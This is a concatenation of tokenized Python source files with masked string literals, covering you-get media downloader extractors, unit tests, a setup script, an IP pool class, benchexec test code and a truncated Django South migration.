</s>
<s> """<STR_LIT>""" <EOL> from simplegist import * <EOL> __author__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> from . . common import * <EOL> import json <EOL> import re <EOL> def cntv_download_by_id ( id , title = None , output_dir = '<STR_LIT:.>' , merge = True , info_only = False ) : <EOL> assert id <EOL> info = json . loads ( get_html ( '<STR_LIT>' + id ) ) <EOL> title = title or info [ '<STR_LIT:title>' ] <EOL> video = info [ '<STR_LIT>' ] <EOL> alternatives = [ x for x in video . keys ( ) if x . endswith ( '<STR_LIT>' ) ] <EOL> chapters = video [ '<STR_LIT>' ] if '<STR_LIT>' in video else video [ '<STR_LIT>' ] <EOL> urls = [ x [ '<STR_LIT:url>' ] for x in chapters ] <EOL> ext = r1 ( r'<STR_LIT>' , urls [ <NUM_LIT:0> ] ) <EOL> assert ext in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> size = <NUM_LIT:0> <EOL> for url in urls : <EOL> _ , _ , temp = url_info ( url ) <EOL> size += temp <EOL> print_info ( site_info , title , ext , size ) <EOL> if not info_only : <EOL> download_urls ( urls , title , ext , size , output_dir = output_dir , merge = False ) <EOL> def cntv_download ( url , output_dir = '<STR_LIT:.>' , merge = True , info_only = False , ** kwargs ) : <EOL> if re . match ( r'<STR_LIT>' , url ) : <EOL> id = match1 ( url , r'<STR_LIT>' ) <EOL> elif re . match ( r'<STR_LIT>' , url ) or re . match ( r'<STR_LIT>' , url ) : <EOL> id = r1 ( r'<STR_LIT>' , get_html ( url ) ) <EOL> elif re . match ( r'<STR_LIT>' , url ) : <EOL> id = r1 ( r'<STR_LIT>' , url ) <EOL> else : <EOL> raise NotImplementedError ( url ) <EOL> cntv_download_by_id ( id , output_dir = output_dir , merge = merge , info_only = info_only ) <EOL> site_info = "<STR_LIT>" <EOL> download = cntv_download <EOL> download_playlist = playlist_not_supported ( '<STR_LIT>' ) </s>
<s> __all__ = [ '<STR_LIT>' ] <EOL> from . . common import * <EOL> import re <EOL> def kuwo_download_by_rid ( rid , output_dir = '<STR_LIT:.>' , merge = True , info_only = False ) : <EOL> html = get_content ( "<STR_LIT>" % rid ) <EOL> title = match1 ( html , r"<STR_LIT>" ) <EOL> url = get_content ( "<STR_LIT>" % rid ) <EOL> songtype , ext , size = url_info ( url ) <EOL> print_info ( site_info , title , songtype , size ) <EOL> if not info_only : <EOL> download_urls ( [ url ] , title , ext , size , output_dir ) <EOL> def kuwo_playlist_download ( url , output_dir = '<STR_LIT:.>' , merge = True , info_only = False , ** kwargs ) : <EOL> html = get_content ( url ) <EOL> matched = set ( re . compile ( "<STR_LIT>" ) . findall ( html ) ) <EOL> for rid in matched : <EOL> kuwo_download_by_rid ( rid , output_dir , merge , info_only ) <EOL> def kuwo_download ( url , output_dir = '<STR_LIT:.>' , merge = True , info_only = False , ** kwargs ) : <EOL> if "<STR_LIT>" in url : <EOL> rid = match1 ( url , '<STR_LIT>' ) <EOL> kuwo_download_by_rid ( rid , output_dir , merge , info_only ) <EOL> else : <EOL> kuwo_playlist_download ( url , output_dir , merge , info_only ) <EOL> site_info = "<STR_LIT>" <EOL> download = kuwo_download <EOL> download_playlist = kuwo_playlist_download </s>
<s> __all__ = [ '<STR_LIT>' ] <EOL> from . . common import * <EOL> from . vine import vine_download <EOL> def twitter_download ( url , output_dir = '<STR_LIT:.>' , merge = True , info_only = False , ** kwargs ) : <EOL> html = get_html ( url ) <EOL> screen_name = r1 ( r'<STR_LIT>' , html ) or r1 ( r'<STR_LIT>' , html ) <EOL> item_id = r1 ( r'<STR_LIT>' , html ) or r1 ( r'<STR_LIT>' , html ) <EOL> page_title = "<STR_LIT>" . format ( screen_name , item_id ) <EOL> try : <EOL> urls = re . findall ( r'<STR_LIT>' , html ) <EOL> assert urls <EOL> images = [ ] <EOL> for url in urls : <EOL> url = '<STR_LIT::>' . join ( url . split ( '<STR_LIT::>' ) [ : - <NUM_LIT:1> ] ) + '<STR_LIT>' <EOL> filename = parse . unquote ( url . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] ) <EOL> title = '<STR_LIT:.>' . join ( filename . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> ext = url . split ( '<STR_LIT::>' ) [ - <NUM_LIT:2> ] . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> size = int ( get_head ( url ) [ '<STR_LIT>' ] ) <EOL> images . append ( { '<STR_LIT:title>' : title , <EOL> '<STR_LIT:url>' : url , <EOL> '<STR_LIT>' : ext , <EOL> '<STR_LIT:size>' : size } ) <EOL> size = sum ( [ image [ '<STR_LIT:size>' ] for image in images ] ) <EOL> print_info ( site_info , page_title , images [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , size ) <EOL> if not info_only : <EOL> for image in images : <EOL> title = image [ '<STR_LIT:title>' ] <EOL> ext = image [ '<STR_LIT>' ] <EOL> size = image [ '<STR_LIT:size>' ] <EOL> url = image [ '<STR_LIT:url>' ] <EOL> print_info ( site_info , title , ext , size ) <EOL> download_urls ( [ url ] , title , ext , size , <EOL> output_dir = output_dir ) <EOL> except : <EOL> if not re . match ( r'<STR_LIT>' , url ) : <EOL> url = r1 ( r'<STR_LIT>' , html ) <EOL> if not url : <EOL> url = '<STR_LIT>' % item_id <EOL> html = get_content ( url ) <EOL> data_config = r1 ( r'<STR_LIT>' , html ) or r1 ( r'<STR_LIT>' , html ) <EOL> i = json . loads ( unescape_html ( data_config ) ) <EOL> if '<STR_LIT>' in i : <EOL> source = i [ '<STR_LIT>' ] <EOL> if not item_id : page_title = i [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in i : <EOL> source = i [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:source>' ] <EOL> if not item_id : page_title = i [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in i : <EOL> vmap_url = i [ '<STR_LIT>' ] <EOL> vmap = get_content ( vmap_url ) <EOL> source = r1 ( r'<STR_LIT>' , vmap ) <EOL> if not item_id : page_title = i [ '<STR_LIT>' ] <EOL> mime , ext , size = url_info ( source ) <EOL> print_info ( site_info , page_title , mime , size ) <EOL> if not info_only : <EOL> download_urls ( [ source ] , page_title , ext , size , output_dir , merge = merge ) <EOL> site_info = "<STR_LIT>" <EOL> download = twitter_download <EOL> download_playlist = playlist_not_supported ( '<STR_LIT>' ) </s>
<s> import unittest <EOL> from you_get import * <EOL> from you_get . extractors import * <EOL> from you_get . common import * <EOL> class YouGetTests ( unittest . TestCase ) : <EOL> def test_freesound ( self ) : <EOL> freesound . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_imgur ( self ) : <EOL> imgur . download ( "<STR_LIT>" , info_only = True ) <EOL> imgur . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_magisto ( self ) : <EOL> magisto . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_mixcloud ( self ) : <EOL> mixcloud . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_vimeo ( self ) : <EOL> vimeo . download ( "<STR_LIT>" , info_only = True ) <EOL> def test_youtube ( self ) : <EOL> youtube . download ( "<STR_LIT>" , info_only = True ) <EOL> youtube . download ( "<STR_LIT>" , info_only = True ) <EOL> youtube . download ( "<STR_LIT>" , info_only = True ) </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> here = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> with open ( os . path . join ( here , '<STR_LIT>' ) ) as f : <EOL> README = f . read ( ) <EOL> requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = README , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> keywords = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> install_requires = requires , <EOL> tests_require = requires , <EOL> test_suite = "<STR_LIT>" , <EOL> entry_points = """<STR_LIT>""" , ) </s>
<s> import ipaddress <EOL> class IPPool ( object ) : <EOL> _pool = [ ] <EOL> _capacity = None <EOL> def __init__ ( self , network ) : <EOL> if isinstance ( network , str ) : <EOL> network = network . decode ( ) <EOL> self . _network = ipaddress . ip_network ( network ) <EOL> self . _hosts = self . _network . hosts ( ) <EOL> def _next_host ( self ) : <EOL> for host in self . _hosts : <EOL> if host in self . _pool : <EOL> continue <EOL> return host <EOL> def register ( self , address ) : <EOL> addr = ipaddress . ip_address ( address ) <EOL> if addr in self . _pool : <EOL> raise RegisteredException ( ) <EOL> self . _pool . append ( addr ) <EOL> def apply ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _capacity is not None and len ( self . _pool ) == self . _capacity : <EOL> return <EOL> addr = self . _next_host ( ) <EOL> if addr is None : <EOL> self . reset ( ) <EOL> addr = self . _next_host ( ) <EOL> if addr is None : <EOL> if self . _capacity is None : <EOL> self . _capacity = len ( self . _pool ) <EOL> else : <EOL> self . _pool . append ( addr ) <EOL> return addr <EOL> def unregister ( self , address ) : <EOL> addr = ipaddress . ip_address ( address ) <EOL> try : <EOL> self . _pool . remove ( addr ) <EOL> except ValueError : <EOL> pass <EOL> def reset ( self ) : <EOL> self . _hosts = self . _network . hosts ( ) <EOL> class RegisteredException ( Exception ) : <EOL> pass </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> import logging <EOL> import sys <EOL> import unittest <EOL> sys . dont_write_bytecode = True <EOL> from benchexec . util import ProcessExitCode <EOL> from benchexec . model import Run <EOL> from benchexec . result import * <EOL> from benchexec . tools . template import BaseTool <EOL> normal_result = ProcessExitCode ( raw = <NUM_LIT:0> , value = <NUM_LIT:0> , signal = None ) <EOL> class TestResult ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . longMessage = True <EOL> logging . disable ( logging . CRITICAL ) <EOL> def create_run ( self , info_result = RESULT_UNKNOWN ) : <EOL> runSet = lambda : None <EOL> runSet . log_folder = '<STR_LIT:.>' <EOL> runSet . options = [ ] <EOL> runSet . real_name = None <EOL> runSet . propertyfile = None <EOL> runSet . benchmark = lambda : None <EOL> runSet . benchmark . base_dir = '<STR_LIT:.>' <EOL> runSet . benchmark . benchmark_file = '<STR_LIT>' <EOL> runSet . benchmark . columns = [ ] <EOL> runSet . benchmark . name = '<STR_LIT>' <EOL> runSet . benchmark . instance = '<STR_LIT>' <EOL> runSet . benchmark . rlimits = { } <EOL> runSet . benchmark . tool = BaseTool ( ) <EOL> def determine_result ( self , returncode , returnsignal , output , isTimeout = False ) : <EOL> return info_result <EOL> runSet . benchmark . tool . determine_result = determine_result <EOL> return Run ( sourcefiles = [ '<STR_LIT>' ] , fileOptions = [ ] , runSet = runSet ) <EOL> def test_simple ( self ) : <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( RESULT_UNKNOWN , run . _analyse_result ( normal_result , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( RESULT_TRUE_PROP , run . _analyse_result ( normal_result , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( RESULT_FALSE_REACH , run . _analyse_result ( normal_result , '<STR_LIT>' , False , None ) ) <EOL> def test_timeout ( self ) : <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , None ) ) <EOL> def test_out_of_memory ( self ) : <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> def test_timeout_and_out_of_memory ( self ) : <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , True , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( normal_result , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> def test_returnsignal ( self ) : <EOL> def signal ( sig ) : <EOL> """<STR_LIT>""" <EOL> return ProcessExitCode ( raw = sig , value = None , signal = sig ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( RESULT_TRUE_PROP , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( RESULT_FALSE_REACH , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( signal ( <NUM_LIT:9> ) , '<STR_LIT>' , False , None ) ) <EOL> def test_exitcode ( self ) : <EOL> def returnvalue ( value ) : <EOL> """<STR_LIT>""" <EOL> return ProcessExitCode ( raw = value << <NUM_LIT:8> , value = value , signal = None ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , True , None ) ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , '<STR_LIT>' ) ) <EOL> run = self . create_run ( info_result = RESULT_TRUE_PROP ) <EOL> self . assertEqual ( RESULT_TRUE_PROP , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_FALSE_REACH ) <EOL> self . assertEqual ( RESULT_FALSE_REACH , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , None ) ) <EOL> run = self . create_run ( info_result = RESULT_UNKNOWN ) <EOL> self . assertEqual ( '<STR_LIT>' , run . _analyse_result ( returnvalue ( <NUM_LIT:1> ) , '<STR_LIT>' , False , None ) ) </s>
<s> """<STR_LIT>""" <EOL> import benchexec . tools . template <EOL> import benchexec . result as result <EOL> class Tool ( benchexec . tools . template . BaseTool ) : <EOL> """<STR_LIT>""" <EOL> def executable ( self ) : <EOL> return '<STR_LIT>' <EOL> def name ( self ) : <EOL> return '<STR_LIT>' <EOL> def cmdline ( self , executable , options , tasks , propertyfile , rlimits ) : <EOL> return [ executable ] + tasks <EOL> def determine_result ( self , returncode , returnsignal , output , isTimeout ) : <EOL> return result . RESULT_FALSE_REACH </s>
<s> """<STR_LIT>""" <EOL> import benchexec . tools . template <EOL> import benchexec . result as result <EOL> class Tool ( benchexec . tools . template . BaseTool ) : <EOL> """<STR_LIT>""" <EOL> def executable ( self ) : <EOL> return '<STR_LIT>' <EOL> def name ( self ) : <EOL> return '<STR_LIT>' <EOL> def cmdline ( self , executable , options , tasks , propertyfile , rlimits ) : <EOL> return [ executable ] + tasks <EOL> def determine_result ( self , returncode , returnsignal , output , isTimeout ) : <EOL> return result . RESULT_TRUE_PROP </s>
<s> import unittest <EOL> from pip import req as req <EOL> from pydep . req import * <EOL> testdatadir = path . join ( path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> class TestRequirements ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . maxDiff = None <EOL> def test_requirements ( self ) : <EOL> """<STR_LIT>""" <EOL> expected0 = [ <EOL> { '<STR_LIT>' : ( ) , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : ( ) , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> ] <EOL> testcases = [ <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , expected0 ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , [ <EOL> { '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None } , <EOL> { '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : None , '<STR_LIT>' : None } , <EOL> { '<STR_LIT>' : ( ) , <EOL> '<STR_LIT:key>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] } <EOL> ] ) , <EOL> ] <EOL> for testcase in testcases : <EOL> dir_ , exp = testcase [ <NUM_LIT:0> ] , testcase [ <NUM_LIT:1> ] <EOL> rootdir = path . join ( testdatadir , dir_ ) <EOL> reqs , err = requirements ( rootdir , resolve = False ) <EOL> if err is not None : <EOL> if exp != '<STR_LIT>' : <EOL> print ( '<STR_LIT>' , err ) <EOL> self . assertEqual ( exp , '<STR_LIT>' ) <EOL> else : <EOL> self . assertListEqual ( sorted ( exp , key = lambda x : x [ '<STR_LIT:key>' ] ) , sorted ( reqs , key = lambda x : x [ '<STR_LIT:key>' ] ) ) <EOL> def test_SetupToolsRequirement ( self ) : <EOL> testcases = [ <EOL> ( "<STR_LIT>" , { <EOL> '<STR_LIT>' : ( ) , <EOL> '<STR_LIT:key>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' <EOL> } ) , <EOL> ( "<STR_LIT>" , { <EOL> '<STR_LIT>' : ( '<STR_LIT:bar>' , ) , <EOL> '<STR_LIT:key>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:foo>' <EOL> } ) , <EOL> ] <EOL> for testcase in testcases : <EOL> req_str , exp_dict = testcase [ <NUM_LIT:0> ] , testcase [ <NUM_LIT:1> ] <EOL> st_req = SetupToolsRequirement ( pr . Requirement . parse ( req_str ) ) <EOL> self . assertDictEqual ( exp_dict , st_req . to_dict ( ) ) <EOL> def test_PipVCSInstallRequirement ( self ) : <EOL> requirements_str = """<STR_LIT>""" <EOL> expected = [ <EOL> { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : None , <EOL> } , <EOL> { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , '<STR_LIT>' : None , <EOL> } , <EOL> { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : '<STR_LIT:bar>' , <EOL> '<STR_LIT>' : [ ] , '<STR_LIT>' : ( ) , '<STR_LIT>' : None , '<STR_LIT>' : None , '<STR_LIT>' : False , <EOL> } , <EOL> ] <EOL> _ , requirements_file = tempfile . mkstemp ( ) <EOL> with open ( requirements_file , '<STR_LIT:w>' ) as f : <EOL> f . write ( requirements_str ) <EOL> pip_reqs = req . parse_requirements ( requirements_file , session = pip . download . PipSession ( ) ) <EOL> reqs = [ PipURLInstallRequirement ( r ) . to_dict ( ) for r in pip_reqs ] <EOL> os . remove ( requirements_file ) <EOL> self . assertListEqual ( expected , reqs ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:name>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:32> ) ) , <EOL> ( '<STR_LIT:url>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:64> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . create_table ( u'<STR_LIT>' , ( <EOL> ( u'<STR_LIT:id>' , self . gf ( '<STR_LIT>' ) ( primary_key = True ) ) , <EOL> ( '<STR_LIT:password>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = datetime . datetime . now ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False ) ) , <EOL> ( '<STR_LIT:username>' , self . gf ( '<STR_LIT>' ) ( unique = True , max_length = <NUM_LIT:30> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:30> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT:30> , blank = True ) ) , <EOL> ( '<STR_LIT:email>' , self . gf ( '<STR_LIT>' ) ( max_length = <NUM_LIT> , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = datetime . datetime . now ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( default = False ) ) , <EOL> ) ) <EOL> db . send_create_signal ( u'<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> m2m_table_name = db . shorten_name ( u'<STR_LIT>' ) <EOL> db . create_table ( m2m_table_name , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ u'<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ u'<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( m2m_table_name , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> m2m_table_name = db . shorten_name ( u'<STR_LIT>' ) <EOL> db . create_table ( m2m_table_name , ( <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , primary_key = True , auto_created = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ u'<STR_LIT>' ] , null = False ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( orm [ u'<STR_LIT>' ] , null = False ) ) <EOL> ) ) <EOL> db . create_unique ( m2m_table_name , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> db . delete_table ( u'<STR_LIT>' ) <EOL> db . delete_table ( db . shorten_name ( u'<STR_LIT>' ) ) <EOL> db . delete_table ( db . shorten_name ( u'<STR_LIT>' ) ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : 